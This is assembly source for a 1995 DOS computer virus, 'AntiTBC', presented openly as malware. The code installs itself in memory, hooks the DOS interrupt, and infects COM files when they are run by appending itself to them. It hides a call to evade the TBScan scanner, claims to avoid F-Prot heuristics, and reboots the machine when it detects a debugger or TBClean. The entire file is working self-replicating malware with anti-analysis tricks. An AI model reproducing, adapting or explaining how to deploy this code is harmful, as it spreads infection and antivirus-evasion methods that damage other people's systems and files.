;  AntiTBC - written by Conzouler/IR 1995
;
;  Based on RSV.
;
;  Features:
;  memory resident
;  com-append on execute
;  no tb-flags (of course)
;  no f-prot heuristics
;  fools tbclean (look at the restore routine)
;

.model tiny
.code
 org 100h

psize   equ     (offset last - offset entry) / 10h + 2
size    equ     offset last - offset entry

entry:
        db      0e9h,0,0                        ; Initial jump
start:
        call    gores

oentry  db      0CDh,20h,90h

gores:
        mov     ax, 4277h                       ; Installation check
        int     21h
        jnc     restore

        mov     ah, 4Ah                         ; Get size of memory block
        mov     bx, 0FFFFh
        int     21h
        mov     ah, 4Ah                         ; Change size of memory
        sub     bx, psize+1                     ; Make space for virus
        int     21h
        mov     ah, 48h                         ; Allocate memory
        mov     bx, psize
        int     21h
        sub     ax, 10h                         ; Compensate org 100h
        mov     es, ax
        mov     di, 103h
        mov     si, sp                          ; Get entry point
        mov     si, [si]
        sub     si, 3                           ; Subtract first call
        mov     cx, size-3
        rep     movsb                           ; Copy virus to new memory
        push    es
        pop     ds
        inc     byte ptr ds:[0F1h]              ; Mark owner of memory
        mov     ax, 3521h                       ; Get interrupt vector
        int     21h
        mov     i21o, bx
        mov     i21s, es
        mov     ah, 25h                         ; Set interrupt vector
        mov     dx, offset vec21
        int     21h

restore:
        mov     di, 100h
        push    cs                              ; Set es and ds to psp
        pop     ds
        push    ds
        pop     es
        pop     si                              ; Get entry point
        push    di                              ; Save it


; This piece of code will fool a debugger

        ; Check if debugger
        jmp     clear                           ; Clear prefetch queue
clear:  mov     byte ptr [$+6], 0               ; Disable next jump
        jmp     nodebug                         ; This jump will be
                                                ; disabled if debugger.
        ; Hohoho.. A debugger or TB-Clean...
        ; Move destructive code to beginning instead
        mov     cx, efflen
        add     si, offset effect - offset oentry
        rep     movsb
        retn

nodebug:
        movsw                                   ; Restore program entry point
        movsb
        retn                                    ; Jump to 100h


effect:
        ; This is the effect that will run if a debugger is used.
        ; Reboot
        db      0EAh, 000h, 0F0h, 0FFh, 0FFh    ; Jump FFFF:F000
efflen  equ     $ - offset effect



vec21:
        cmp     ax, 4277h                       ; Installation check
        jne     v21e
        iret
v21e:   cmp     ax, 4B00h                       ; Execute program
        jne     v21x

        push    ax                              ; Infect file
        push    bx
        push    cx
        push    dx
        push    ds

        mov     ax, 3D82h                       ; Open file
        int     21h
        xchg    ax, bx                          ; Put handle in bx

        push    cs                              ; Read first bytes
        pop     ds                              ; to oentry
        mov     ah, 3Fh
        mov     dx, offset oentry
        mov     cx, 3
        int     21h
        cmp     byte ptr oentry, 'M'            ; Check if exe file
        je      infectx
        push    cx

        mov     ax, 4202h                       ; Seek to eof
        xor     cx, cx
        cwd                                     ; Zero dx
        int     21h

        sub     ax, 3                           ; Get offset to eof
        mov     word ptr entry[1], ax           ; Save as jump
        xchg    dx, ax
        mov     ax, 4200h
        int     21h
        mov     ah, 3Fh                         ; Infection check
        mov     dx, offset last
        pop     cx

        int     21h
        cmp     byte ptr last[2], 0EAh          ; Check if infected
        je      infectx

        mov     byte ptr entry, 0E9h            ; Create jump opcode

        mov     ah, 3Fh                         ; Append virus
        inc     ah                              ; Fool TBScan
        push    ax
        mov     dx, 103h
        mov     cx, size-7
        int     21h

        mov     ax, 4200h                       ; Insert jump
        xor     cx, cx
        cwd
        int     21h

        pop     ax
        mov     dh, 1h                          ; 100h in dx
        mov     cl, 3                           ; 3 in cx
        int     21h
infectx:
        mov     ah, 3Eh
        int     21h

        pop     ds
        pop     dx
        pop     cx
        pop     bx
        pop     ax

v21x:   db      0EAh                            ; Jump to dos vector
i21o    dw      ?
i21s    dw      ?
last:
end     entry